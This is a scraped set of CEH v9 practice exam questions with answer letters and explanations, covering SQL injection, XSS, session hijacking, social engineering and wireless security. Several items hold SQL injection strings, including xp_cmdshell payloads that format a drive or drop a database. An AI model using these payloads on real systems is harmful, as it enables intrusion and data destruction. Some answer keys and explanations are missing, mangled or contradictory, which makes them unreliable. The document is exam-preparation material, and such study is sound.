CEHv9 Questions 301-400

346 Bubba has just accessed he preferred ecommerce web site and has spotted an item that he would like to buy. Bubba considers the price a bit too steep. He looks at the source code of the webpage and decides to save the page locally, so that he can modify the page variables. In the context of web application security, what do you think Bubba has changes? A. A hidden form field value. B. A hidden price value. C. An integer variable. D. A page cannot be changed locally, as it is served by a web server.

A Explanation:

384 Exhibit: You are conducting pen-test against a company's website using SQL Injection techniques. You enter "anuthing or 1=1-" in the username filed of an authentication form. This is the output returned from the server. What is the next step you should do? A. Identify the user context of the web application by running_ http://www.example.com/order/include_rsa_asp?pressReleaseID=5 AND USER_NAME() = 'dbo' B. Identify the database and table name by running: 230 http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1))) > 109 C. Format the C: drive and delete the database by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'format c: /q /yes '; drop database myDB; -- D. Reboot the web server by running: http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'iisreset -reboot'; --

A Explanation:

364 Bret is a web application administrator and has just read that there are a number of surprisingly common web application vulnerabilities that can be exploited by unsophisticated attackers with easily available tools on the Internet. He has also read that when an organization deploys a web application, they invite the world to send HTTP requests. Attacks buried in these requests sail past firewalls, filters, platform hardening, SSL, and IDS without notice because they are inside legal HTTP requests. Bret is determined to weed out any vulnerabilities. What are some common vulnerabilities in web applications that he should be concerned about? A. Non-validated parameters, broken access control, broken account and session management, cross-side scripting and buffer overflows are just a few common vulnerabilities B. No IDS configured, anonymous user account set as default, missing latest security patch, no firewall filters set and visible clear text passwords are just a few common vulnerabilities C. Visible clear text passwords, anonymous user account set as default, missing latest security patch, no firewall filters set and no SSL configured are just a few common vulnerabilities D. No SSL configured, anonymous user account set as default, missing latest security patch, no firewall filters set and an inattentive system administrator are just a few common vulnerabilities

A Explanation: 217

377 You have chosen a 22 character word from the dictionary as your password. How long will it take to crack the password by an attacker? A. 5 minutes B. 23 days C. 200 years D. 16 million years

A Explanation: A dictionary password cracker simply takes a list of dictionary words, and one at a time encrypts them to see if they encrypt to the one way hash from the system. If the hashes are equal, the password is considered cracked, and the word tried from the dictionary list is the password. As long as you use a word found in or similar to a word found in a dictionary the password is considered to be weak.

302 Steven, a security analyst for XYZ associates, is analyzing packets captured by Ethereal on a Linux Server inside his network when the server starts to slow down tremendously. Steven examines the following Ethereal captures: 181 A. Smurf Attack B. ARP Spoofing C. Ping of Death D. SYN Flood

A Explanation: A perpetrator is sending a large amount of ICMP echo (ping) traffic to IP broadcast addresses, all of it having a spoofed source address of the intended victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply, multiplying the traffic by the number of hosts responding. Topic 9, Social Engineering

370 _____ ensures that the enforcement of organizational security policy does not rely on voluntary web application user compliance. It secures information by assigning sensitivity labels on information and comparing this to the level of security a user is operating at. A. Mandatory Access Control B. Authorized Access Control C. Role-based Access Control D. Discretionary Access Control

A Explanation: Explanation : In computer security, mandatory access control (MAC) is a kind of access control, defined by the TCSEC as "a means of restricting access to objects based on the sensitivity (as represented by a label) of the information contained in the objects and the formal authorization (i.e., clearance) of subjects to access information of such sensitivity."

371 Say that "abigcompany.com" had a security vulnerability in the javascript on their website in the past. They recently fixed the security vulnerability, but it had been there for many months. Is there some way to 4go back and see the code for that error? Select the best answer. A. archive.org B. There is no way to get the changed webpage unless you contact someone at the company C. Usenet D. Javascript would not be in their html so a service like usenet or archive wouldn't help you

A Explanation: Explanations: Archive.org is a website that periodically archives internet content. They have archives of websites over many years. It could be used to go back and look at the javascript as javascript would be in the HTML code. 221

345 What is Form Scalpel used for? A. Dissecting HTML Forms B. Dissecting SQL Forms C. Analysis of Access Database Forms D. Troubleshooting Netscape Navigator E. Quatro Pro Analysis Tool

A Explanation: Form Scalpel automatically extracts forms from a given web page and splits up all fields for editing and manipulation. 207 - - - -

382 Bill is attempting a series of SQL queries in order to map out the tables within the database that he is trying to exploit. Choose the attack type from the choices given below. A. Database Fingerprinting B. Database Enumeration C. SQL Fingerprinting D. SQL Enumeration

A Explanation: He is trying to create a view of the characteristics of the target database, he is taking it's fingerprints.

301 Smurf is a simple attack based on IP spoofing and broadcasts. A single packet (such as an ICMP Echo Request) is sent as a directed broadcast to a subnet on the Internet. All the machines on that subnet respond to this broadcast. By spoofing the source IP Address of the packet, all the responses will get sent to the spoofed IP Address. Thus, a hacker can often flood a victim with hundreds of responses for every request the hacker sends out. Who are the primary victims of these attacks on the Internet today? A. IRC servers are the primary victim to smurf attacks B. IDS devices are the primary victim to smurf attacks C. Mail Servers are the primary victim to smurf attacks D. SPAM filters are the primary victim to surf attacks

A Explanation: IRC servers are the primary victim to smurf attacks. Script-kiddies run programs that scan the Internet looking for "amplifiers" (i.e. subnets that will respond). They compile lists of these amplifiers and exchange them with their friends. Thus, when a victim is flooded with responses, they will appear to come from all over the Internet. On IRCs, hackers will use bots (automated programs) that connect to IRC servers and collect IP addresses. The bots then send the forged packets to the amplifiers to inundate the victim.

372 The GET method should never be used when sensitive data such as credit is being sent to a CGI program. This is because any GET command will appear in the URL and will be logged by any servers. For example, let's say that you've entered your credit card information into a form that uses the GET method. The URL may appear like this: https://www.xsecurity-bank.com/creditcard.asp?cardnumber=454543433532234 The GET method appends the credit card number to the URL. This means that anyone with access to a server log will be able to obtain this information. How would you protect from this type of attack? A. Replace the GET with POST method when sending data B. Never include sensitive information in a script C. Use HTTOS SSLV3 to send the data instead of plain HTTPS D. Encrypt the data before you send using GET method

A Explanation: If the method is "get", the user agent takes the value of action, appends a ? to it, then appends the form data set, encoded using the application/x-www-form-urlencoded content type. The user agent then traverses the link to this URI. If the method is "post" --, the user agent conducts an HTTP post transaction using the value of the action attribute and a message created according to the content type specified by the enctype attribute.

314 188 Study the following e-mail message. When the link in the message is clicked, it will take you to an address like: http://hacker.xsecurity.com/in.htm. Note that hacker.xsecurity.com is not an official SuperShopper site! What attack is depicted in the below e-mail? Dear SuperShopper valued member, Due to concerns, for the safety and integrity of the SuperShopper community we have issued this warning message. It has come to our attention that your account information needs to be updated due to inactive members, frauds and spoof reports. If you could please take 5-10 minutes out of your online experience and renew your records you will not run into any future problems with the online service. However, failure to update your records will result to your account cancellation. This notification expires within 24 hours. Once you have updated your account records your SuperShopper will not be interrupted and will continue as normal. Please follow the link below and renew your account information. https://www.supershopper.com/cgi-bin/webscr?cmd=update-run SuperShopper Technical Support http://www.supershopper.com A. Phishing attack B. E-mail spoofing C. social engineering D. Man in the middle attack

A Explanation: Phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. Phishing is typically carried out using email or an instant message, although phone contact has been used as well. 189

305 What is the most common vehicle for social engineering attacks? 183 A. Phone B. Email C. In person D. P2P Networks

A Explanation: Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone.

379 Johnny is a member of the hacking group orpheus1. He is currently working on breaking into the Department of Defense's front end exchange server. He was able to get into the server, located in a DMZ, by using an unused service account that had a very weak password that he was able to guess. Johnny wants to crack the administrator password, but does not have a lot of time to crack it. He wants to use a tool that already has the LM hashes computed for all possible permutations of the administrator password. What tool would be best used to accomplish this? A. RainbowCrack B. SMBCrack C. SmurfCrack D. PSCrack

A Explanation: RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called "rainbow table". It does take a long time to precompute the tables. But once the one time precomputation is finished, a time-memory trade-off cracker can be hundreds of times faster than a brute force cracker, with the help of precomputed tables. Topic 14, SQL Injection

381 Bank of Timbuktu was a medium-sized, regional financial institution in Timbuktu. The bank has deployed a new Internet-accessible Web application recently, using which customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser. John Stevens was in charge of information security at Bank of Timbuktu. After one month in production, several customers complained about the Internet enabled banking application. Strangely, the account balances of many bank's customers has been changed! 227 However, money hadn't been removed from the bank. Instead, money was transferred between accounts. Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries: Attempted login of unknown user: John Attempted login of unknown user: sysaR Attempted login of unknown user: sencat Attempted login of unknown user: pete ''; Attempted login of unknown user: ' or 1=1-- Attempted login of unknown user: '; drop table logins-- Login of user jason, sessionID= 0x75627578626F6F6B Login of user daniel, sessionID= 0x98627579539E13BE Login of user rebecca, sessionID= 0x90627579944CCB811 Login of user mike, sessionID= 0x9062757935FB5C64 Transfer Funds user jason Pay Bill user mike Logout of user mike What kind of attack did the Hacker attempt to carry out at the bank? (Choose the best answer) A. The Hacker attempted SQL Injection technique to gain access to a valid bank login ID. B. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason's session. C. The Hacker attempted a brute force attack to guess login ID and password using password cracking tools. D. The Hacker used a random generator module to pass results to the Web server and exploited Web application CGI vulnerability.

A Explanation: The following part: Attempted login of unknown user: pete ''; Attempted login of unknown user: ' or 1=1-- Attempted login of unknown user: '; drop table logins-- 228 Clearly shows a hacker trying to perform a SQL injection by bypassing the login with the statement 1=1 and then dumping the logins table.

331 After a client sends a connection request (SYN) packet to the server, the server will respond (SYN-ACK) with a sequence number of its choosing, which then must be acknowledge (ACK) by the client. This sequence number is predictable; the attack connects to a service first with its own IP address, records the sequence number chosen and then opens a second connection from a forget IP address. The attack doesn't see the SYN-ACK (or any other packet) from the server, but can guess the correct responses. If the source IP Address is used for authentication, the attacker can use the one-side communication to break into the server. What attacks can you successfully launch against a server using the above technique? A. Session Hijacking attacks B. Denial of Service attacks C. Web Page defacement attacks D. IP Spoofing Attacks

A Explanation: The term Session Hijacking refers to the exploitation of a valid computer session - sometimes also called a session key - to gain unauthorised access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer. Topic 11, Hacking Web Servers

303 Your boss at ABC.com asks you what are the three stages of Reverse Social Engineering. A. Sabotage, advertising, Assisting B. Sabotage, Advertising, Covering C. Sabotage, Assisting, Billing 182 D. Sabotage, Advertising, Covering

A Explanation: Typical social interaction dictates that if someone gives us something then it is only right for us to return the favour. This is known as reverse social engineering, when an attacker sets up a situation where the victim encounters a problem, they ask the attacker for help and once the problem is solved the victim then feels obliged to give the information requested by the attacker.

354 Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers. A. True B. False

A Explanation: Using HTTP basic authentication will result in your password being sent over the internet as clear text. Don't use this technique unless you understand what the ramifications of this are.

389 A particular database threat utilizes a SQL injection technique to penetrate a target system. How would an attacker use this technique to compromise a database? 233 A. An attacker uses poorly designed input validation routines to create or alter SQL commands to gain access to unintended data or execute commands of the database B. An attacker submits user input that executes an operating system command to compromise a target system C. An attacker gains control of system to flood the target system with requests, preventing legitimate users from gaining access D. An attacker utilizes an incorrect configuration that leads to access with higher-than-expected privilege of the database

A Explanation: Using the poorly designed input validation to alter or steal data from a database is a SQL injection attack.

356 Which of the following statements best describes the term Vulnerability? A. A weakness or error that can lead to a compromise B. An agent that has the potential to take advantage of a weakness C. An action or event that might prejudice security D. The loss potential of a threat.

A Explanation: Vulnerabilities are all weaknesses that can be exploited.

396 WEP is used on 802.11 networks, what was it designed for? 238 A. WEP is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what it usually expected of a wired LAN. B. WEP is designed to provide strong encryption to a wireless local area network (WLAN) with a lever of integrity and privacy adequate for sensible but unclassified information. C. WEP is designed to provide a wireless local area network (WLAN) with a level of availability and privacy comparable to what is usually expected of a wired LAN. D. WEOP is designed to provide a wireless local area network (WLAN) with a level of privacy comparable to what it usually expected of a wired LAN.

A Explanation: WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004.

308 Usernames, passwords, e-mail addresses, and the location of CGI scripts may be obtained from which of the following information sources? A. Company web site B. Search engines C. EDGAR Database query D. Whois query

A Explanation: Whois query would not enable us to find the CGI scripts whereas in the actual website, some of them will have scripts written to make the website more user friendly. The EDGAR database would in fact give us a lot of the information requested but not the location of CGI scripts, as would a simple search engine on the Internet if you have the time needed. 185

336 Which of the following buffer overflow exploits are related to Microsoft IIS web server? (Choose three) A. Internet Printing Protocol (IPP) buffer overflow B. Code Red Worm C. Indexing services ISAPI extension buffer overflow D. NeXT buffer overflow

A,B,C Explanation: Both the buffer overflow in the Internet Printing Protocol and the ISAPI extension buffer overflow is explained in Microsoft Security Bulletin MS01-023. The Code Red worm was a computer worm released on the Internet on July 13, 2001. It attacked computers running Microsoft's IIS web server.

319 Which of these are phases of a reverse social engineering attack? Select the best answers. A. Sabotage B. Assisting C. Deceiving D. Advertising E. Manipulating

A,B,D Explanation: Explanations: According to "Methods of Hacking: Social Engineering", by Rick Nelson, the three phases of reverse social engineering attacks are sabotage, advertising, and assisting.

378 Which of the following is most effective against passwords ? Select the

A. Dictionary Attack B. BruteForce attack C. Targeted Attack D. Manual password Attack Answer: B Explanation: The most effective means of password attack is brute force, in a brute force attack the program will attempt to use every possible combination of characters. While this takes longer then a dictionary attack, which uses a text file of real words, it is always capable of breaking the password. 225

392 What is the problem with this ASP script (login.asp)? <% Set objConn = CreateObject("ADODB.Connection") objConn.Open Application("WebUsersConnection") sSQL="SELECT * FROM Users where Username=? & Request("user") & _ "?and Password=? & Request("pwd") & "? Set RS = objConn.Execute(sSQL) If RS.EOF then Response.Redirect("login.asp?msg=Invalid Login") Else Session.Authorized = True 235 Set RS = nothing Set objConn = nothing Response.Redirect("mainpage.asp") End If %> A. The ASP script is vulnerable to XSS attack B. The ASP script is vulnerable to SQL Injection attack C. The ASP script is vulnerable to Session Splice attack D. The ASP script is vulnerable to Cross Site Scripting attack

B Explanation:

342 000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00 ...^......^...E. 010 05 DC 1D E4 40 00 7F 06 C2 6D 0A 00 00 02 0A 00 [email protected]...... 020 01 C9 00 50 07 75 05 D0 00 C0 04 AE 7D F5 50 10 ...P.u......}.P. 030 70 79 8F 27 00 00 48 54 54 50 2F 31 2E 31 20 32 py.'..HTTP/1.1.2 040 30 30 20 4F 4B 0D 0A 56 69 61 3A 20 31 2E 30 20 00.OK..Via:.1.0. 050 53 54 52 49 44 45 52 0D 0A 50 72 6F 78 79 2D 43 STRIDER..Proxy-C 060 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D onnection:.Keep- 070 41 6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 4C Alive..Content-L 080 65 6E 67 74 68 3A 20 32 39 36 37 34 0D 0A 43 6F ength:.29674..Co 090 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 ntent-Type:.text 0A0 2F 68 74 6D 6C 0D 0A 53 65 72 76 65 72 3A 20 4D /html..Server:. 0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30 ..Microsoft 0C0 0D 0A 44 61 74 65 3A 20 53 75 6E 2C 20 32 35 20 ..Date:.Sun,.25. 0D0 4A 75 6C 20 31 39 39 39 20 32 31 3A 34 35 3A 35 Jul.1999.21:45:5 0E0 31 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52 61 1.GMT..Accept-Ra 0F0 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 4C 61 73 nges:.bytes..Las 100 74 2D 4D 6F 64 69 66 69 65 64 3A 20 4D 6F 6E 2C t-Modified:.Mon, 204 110 20 31 39 20 4A 75 6C 20 31 39 39 39 20 30 37 3A .19.Jul.1999.07: 120 33 39 3A 32 36 20 47 4D 54 0D 0A 45 54 61 67 3A 39:26.GMT..ETag: 130 20 22 30 38 62 37 38 64 33 62 39 64 31 62 65 31 ."08b78d3b9d1be1 140 3A 61 34 61 22 0D 0A 0D 0A 3C 74 69 74 6C 65 3E :a4a"....<title> 150 53 6E 69 66 66 69 6E 67 20 28 6E 65 74 77 6F 72 Sniffing.(networ 160 6B 20 77 69 72 65 74 61 70 2C 20 73 6E 69 66 66 k.wiretap,.sniff 170 65 72 29 20 46 41 51 3C 2F 74 69 74 6C 65 3E 0D er).FAQ</title>. 180 0A 0D 0A 3C 68 31 3E 53 6E 69 66 66 69 6E 67 20 ...<h1>Sniffing. 190 28 6E 65 74 77 6F 72 6B 20 77 69 72 65 74 61 70 (network.wiretap 1A0 2C 20 73 6E 69 66 66 65 72 29 20 46 41 51 3C 2F ,.sniffer).FAQ</ 1B0 68 31 3E 0D 0A 0D 0A 54 68 69 73 20 64 6F 63 75 h1>....This.docu 1C0 6D 65 6E 74 20 61 6E 73 77 65 72 73 20 71 75 65 ment.answers.que 1D0 73 74 69 6F 6E 73 20 61 62 6F 75 74 20 74 61 70 stions.about.tap 1E0 70 69 6E 67 20 69 6E 74 6F 20 0D 0A 63 6F 6D 70 ping.into...comp 1F0 75 74 65 72 20 6E 65 74 77 6F 72 6B 73 20 61 6E uter.networks.an This packet was taken from a packet sniffer that monitors a Web server. This packet was originally 1514 bytes long, but only the first 512 bytes are shown here. This is the standard hexdump representation of a network packet, before being decoded. A hexdump has three columns: the offset of each line, the hexadecimal data, and the ASCII equivalent. This packet contains a 14-byte Ethernet header, a 20-byte IP header, a 20-byte TCP header, an HTTP header ending in two line-feeds (0D 0A 0D 0A) and then the data. By examining the packet identify the name and version of the Web server? A. Apache 1.2 B. IIS 4.0 C. IIS 5.0 D. Linux WServer 2.3

B Explanation: We see that the server is Microsoft, but the exam designer didn't want to make it easy for you. So what they did is blank out the IIS 4.0. The key is in line "0B0" as you see: 205 0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30 ..Microsoft 49 is I, so we get II 53 is S, so we get IIS 2F is a space 34 is 4 2E is . 30 is 0 So we get IIS 4.0 The answer is B If you don't remember the ASCII hex to Character, there are enough characters and numbers already converted. For example, line "050" has STRIDER which is 53 54 52 49 44 45 52 and gives you the conversion for the "I:" and "S" characters (which is "49" and "53").

341 You work as security technician at ABC.com. While doing web application testing, you might be required to look through multiple web pages online which can take a long time. Which of the processes listed below would be a more efficient way of doing this type of validation? A. Use mget to download all pages locally for further inspection. B. Use wget to download all pages locally for further inspection. C. Use get* to download all pages locally for further inspection. D. Use get() to download all pages locally for further inspection.

B Explanation: Wget is a utility used for mirroring websites, get* doesn't work, as for the actual FTP command to 203 work there needs to be a space between get and * (ie. get *), get(); is just bogus, that's a C function that's written 100% wrong. mget is a command used from "within" ftp itself, ruling out A. Which leaves B use wget, which is designed for mirroring and download files, especially web pages, if used with the -R option (ie. wget -R www.ABC.com) it could mirror a site, all expect protected portions of course. Note: GNU Wget is a free network utility to retrieve files from the World Wide Web using HTTP and FTP and can be used to make mirrors of archives and home pages thus enabling work in the background, after having logged off.

353 Bill successfully executed a buffer overflow against a Windows IIS web server. He has been able to spawn in interactive shell and plans to deface the main web page. He fist attempts to use the "Echo" command to simply overwrite index.html and remains unsuccessful. He then attempts to delete the page and achieves no progress. Finally, he tires to overwrite it with another page in which also he remains unsuccessful. What is the probable cause of Bill's problem? 211 A. The system is a honeypot B. The HTML file has permissions of read only C. You can't use a buffer overflow to deface a web page D. There is a problem with the shell and he needs to run the attack again

B Explanation: A honeypot has no interest in stopping an intruder from altering the "target" files. A buffer overflow is a way to gain access to the target computer. Once he has spawned a shell it is unlikely that it will not work as intended, but the user context that the shell is spawned in might stop him from altering the index.html file incase he doesn't have sufficient rights.

323 John is using tokens for the purpose of strong authentication. He is not confident that his security is considerably strong. In the context of Session hijacking why would you consider this as a false sense of security? A. The token based security cannot be easily defeated. B. The connection can be taken over after authentication. C. A token is not considered strong authentication. D. Token security is not widely used in the industry.

B Explanation: A token will give you a more secure authentication, but the tokens will not help against attacks that are directed against you after you have been authenticated.

399 In an attempt to secure his wireless network, Bob turns off broadcasting of the SSID. He concludes that since his access points require the client computer to have the proper SSID, it would prevent others from connecting to the wireless network. Unfortunately unauthorized users are still able to connect to the wireless network. Why do you think this is possible? 240 A. Bob forgot to turn off DHCP. B. All access points are shipped with a default SSID. C. The SSID is still sent inside both client and AP packets. D. Bob's solution only works in ad-hoc mode.

B Explanation: All access points are shipped with a default SSID unique to that manufacturer, for example 3com uses the default ssid comcomcom.

365 Liza has forgotten her password to an online bookstore. The web application asks her to key in her email so that they can send her the password. Liza enters her email [email protected]'. The application displays server error. What is wrong with the web application? A. The email is not valid B. User input is not sanitized C. The web server may be down D. The ISP connection is not reliable

B Explanation: All input from web browsers, such as user data from HTML forms and cookies, must be stripped of special characters and HTML tags as described in the following CERT advisories: http://www.cert.org/advisories/CA-1997-25.html http://www.cert.org/advisories/CA-2000-02.html

321 What is the most common vehicle for social engineering attacks? A. Email B. Direct in person C. Local Area Networks D. Peer to Peer Networks

B Explanation: All social engineering techniques are based on flaws in human logic known as cognitive biases. Topic 10, Session Hijacking

324 What is the key advantage of Session Hijacking? A. It can be easily done and does not require sophisticated skills. B. You can take advantage of an authenticated connection. C. You can successfully predict the sequence number generation. D. You cannot be traced in case the hijack is detected.

B Explanation: As an attacker you don't have to steal an account and password in order to take 194 advantage of an authenticated connection.

362 What does black box testing mean? A. You have full knowledge of the environment B. You have no knowledge of the environment C. You have partial knowledge of the environment

B Explanation: Black box testing is conducted when you have no knowledge of the environment. It is more time consuming and expensive.

398 In an attempt to secure his wireless network, Bob implements a VPN to cover the wireless communications. Immediately after the implementation, users begin complaining about how slow the wireless network is. After benchmarking the network's speed. Bob discovers that throughput has dropped by almost half even though the number of users has remained the same. Why does this happen in the VPN over wireless implementation? A. The stronger encryption used by the VPN slows down the network. B. Using a VPN with wireless doubles the overhead on an access point for all direct client to access point communications. C. VPNs use larger packets then wireless networks normally do. D. Using a VPN on wireless automatically enables WEP, which causes additional overhead.

B Explanation: By applying VPN the access point will have to recalculate all headers destined for client and from clients twice.

359 Scanning for services is an easy job for Bob as there are so many tools available from the Internet. In order for him to check the vulnerability of company, he went through a few scanners that are currently available. Here are the scanners that he uses: Axent's NetRecon (http://www.axent.com) SARA, by Advanced Research Organization (http://www-arc.com/sara) VLAD the Scanner, by Razor (http://razor.bindview.com/tools/) However, there are many other alternative ways to make sure that the services that have been scanned will be more accurate and detailed for Bob. What would be the best method to accurately identify the services running on a victim host? 214 A. Using Cheops-ng to identify the devices of company. B. Using the manual method of telnet to each of the open ports of company. C. Using a vulnerability scanner to try to probe each port to verify or figure out which service is running for company. D. Using the default port and OS to make a best guess of what services are running on each port for company.

B Explanation: By running a telnet connection to the open ports you will receive banners that tells you what service is answering on that specific port.

355 Barney is looking for a Windows NT/2000/XP command-line tool that can be used to assign display or modify ACLs (Access Control Lists) to files or folders and that could also be used within batch files. Which of the following tools could be used for this purpose? A. PERM.EXE B. CACLS.EXE C. CLACS.EXE D. NTPERM.EXE 212

B Explanation: Cacls.exe (Change Access Control Lists) is an executable in Microsoft Windows to change Access Control List (ACL) permissions on a directory, its subcontents, or files. An access control list is a list of permissions for a file or directory that controls who can access it. Topic 12, Web Application Vulnerabilities

335 Bart is looking for a Windows NT/2000/XP command-line tool that can be used to assign, display, or modify ACL's (access control lists) to files or folders and also one that can be used within batch files. Which of the following tools can be used for that purpose? (Choose the best answer) A. PERM.exe B. CACLS.exe C. CLACS.exe D. NTPERM.exe

B Explanation: Cacls.exe is a Windows NT/2000/XP command-line tool you can use to assign, display, or modify ACLs (access control lists) to files or folders. Cacls is an interactive tool, and since it's a command-line utility, you can also use it in batch files. 200

343 This kind of attack will let you assume a users identity at a dynamically generated web page or site: A. SQL Injection B. Cross Site Scripting C. Session Hijacking D. Zone Transfer

B Explanation: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. 206

332 198 Sara is making use of Digest Authentication for her Web site. Why is this considered to be more secure than Basic authentication? A. Basic authentication is broken B. The password is never sent in clear text over the network C. The password sent in clear text over the network is never reused. D. It is based on Kerberos authentication protocol

B Explanation: Digest access authentication is one of the agreed methods a web page can use to negotiate credentials with a web user (using the HTTP protocol). This method builds upon (and obsoletes) the basic authentication scheme, allowing user identity to be established without having to send a password in plaintext over the network.

340 You visit a website to retrieve the listing of a company's staff members. But you can not find it on the website. You know the listing was certainly present one year before. How can you retrieve information from the outdated website? A. Through Google searching cached files B. Through Archive.org C. Download the website and crawl it D. Visit customers' and prtners' websites

B Explanation: Explanation: Archive.org mirrors websites and categorizes them by date and month depending on the crawl time. Archive.org dates back to 1996, Google is incorrect because the cache is only as recent as the latest crawl, the cache is over-written on each subsequent crawl. Download the website is incorrect because that's the same as what you see online. Visiting customer partners websites is just bogus. The answer is then Firmly, C, archive.org

328 You want to carry out session hijacking on a remote server. The server and the client are communicating via TCP after a successful TCP three way handshake. The server has just received packet #120 from the client. The client has a receive window of 200 and the server has a receive window of 250. Within what range of sequence numbers should a packet, sent by the client fall in order to be accepted by the server? A. 200-250 B. 121-371 C. 120-321 D. 121-231 E. 120-370 196

B Explanation: Package number 120 have already been received by the server and the window is 250 packets, so any package number from 121 (next in sequence) to 371 (121+250).

390 Jimmy, an attacker, knows that he can take advantage of poorly designed input validation routines to create or alter SQL commands to gain access to private data or execute commands in the database. What technique does Jimmy use to compromise a database? A. Jimmy can submit user input that executes an operating system command to compromise a target system B. Jimmy can utilize this particular database threat that is an SQL injection technique to penetrate a target system C. Jimmy can utilize an incorrect configuration that leads to access with higher-than-expected privilege of the database D. Jimmy can gain control of system to flood the target system with requests, preventing legitimate users from gaining access

B Explanation: SQL injection is a security vulnerability that occurs in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. 234

330 Which of the following attacks takes best advantage of an existing authenticated connection A. Spoofing B. Session Hijacking C. Password Sniffing D. Password Guessing

B Explanation: Session hijacking is the act of taking control of a user session after successfully 197 obtaining or generating an authentication session ID. Session hijacking involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's Web application session while that session is still in progress.

311 Within the context of Computer Security, which of the following statements best describe Social Engineering? A. Social Engineering is the act of publicly disclosing information. B. Social Engineering is the act of getting needed information from a person rather than breaking into a system. C. Social Engineering is the means put in place by human resource to perform time accounting. D. Social Engineering is a training program within sociology studies.

B Explanation: Social engineering is a collection of techniques used to manipulate people into performing actions or divulging confidential information.

349 Dan is conducting a penetration testing and has found a vulnerability in a Web Application which gave him the sessionID token via a cross site scripting vulnerability. Dan wants to replay this token. However, the session ID manager (on the server) checks the originating IP address as well. Dan decides to spoof his IP address in order to replay the sessionID. Why do you think Dan might not be able to get an interactive session? A. Dan cannot spoof his IP address over TCP network B. The server will send replies back to the spoofed IP address C. Dan can establish an interactive session only if he uses a NAT D. The scenario is incorrect as Dan can spoof his IP and get responses 209

B Explanation: Spoofing your IP address is only effective when there is no need to establish a two way connection as all traffic meant to go to the attacker will end up at the place of the spoofed address.

313 Jake works as a system administrator at Acme Corp. Jason, an accountant of the firm befriends him at the canteen and tags along with him on the pretext of appraising him about potential tax benefits. Jason waits for Jake to swipe his access card and follows him through the open door into the secure systems area. How would you describe Jason's behavior within a security context? A. Trailing B. Tailgating C. Swipe Gating D. Smooth Talking

B Explanation: Tailgating, in which an unauthorized person follows someone with a pass into an office, is a very simple social engineering attack. The intruder opens the door, which the authorized user walks through, and then engages them in conversation about the weather or weekend sport while they walk past the reception area together.

375 Consider the following code: 223 If an attacker can trick a victim user to click a link like this and the web application does not validate input, then the victim's browser will pop up an alert showing the users current set of cookies. An attacker can do much more damage, including stealing passwords, resetting your home page or redirecting the user to another web site. What is the countermeasure against XSS scripting? A. Create an IP access list and restrict connections based on port number B. Replace "<" and ">" characters with ?lt; and ?gt; using server scripts C. Disable Javascript in IE and Firefox browsers D. Connect to the server using HTTPS protocol instead of HTTP

B Explanation: The correct answer contains a string which is an HTML-quoted version of the original script. The quoted versions of these characters will appear as literals in a browser, rather than with their special meaning as HTML tags. This prevents any script from being injected into HTML output, but it also prevents any user-supplied input from being formatted with benign HTML. Topic 13, Web Based Password Cracking Techniques

363 Bryan notices the error on the web page and asks Liza to enter liza' or '1'='1 in the email field. They are greeted with a message "Your login information has been mailed to 216 [email protected]". What do you think has occurred? A. The web application picked up a record at random B. The web application returned the first record it found C. The server error has caused the application to malfunction D. The web application emailed the administrator about the error

B Explanation: The web application sends a query to an SQL database and by giving it the criteria 1=1, which always will be true, it will return the first value it finds.

325 What type of cookies can be generated while visiting different web sites on the Internet? A. Permanent and long term cookies. B. Session and permanent cookies. C. Session and external cookies. D. Cookies are all the same, there is no such thing as different type of cookies.

B Explanation: There are two types of cookies: a permanent cookie that remains on a visitor's computer for a given time and a session cookie the is temporarily saved in the visitor's computer memory during the time that the visitor is using the Web site. Session cookies disappear when you close your Web browser.

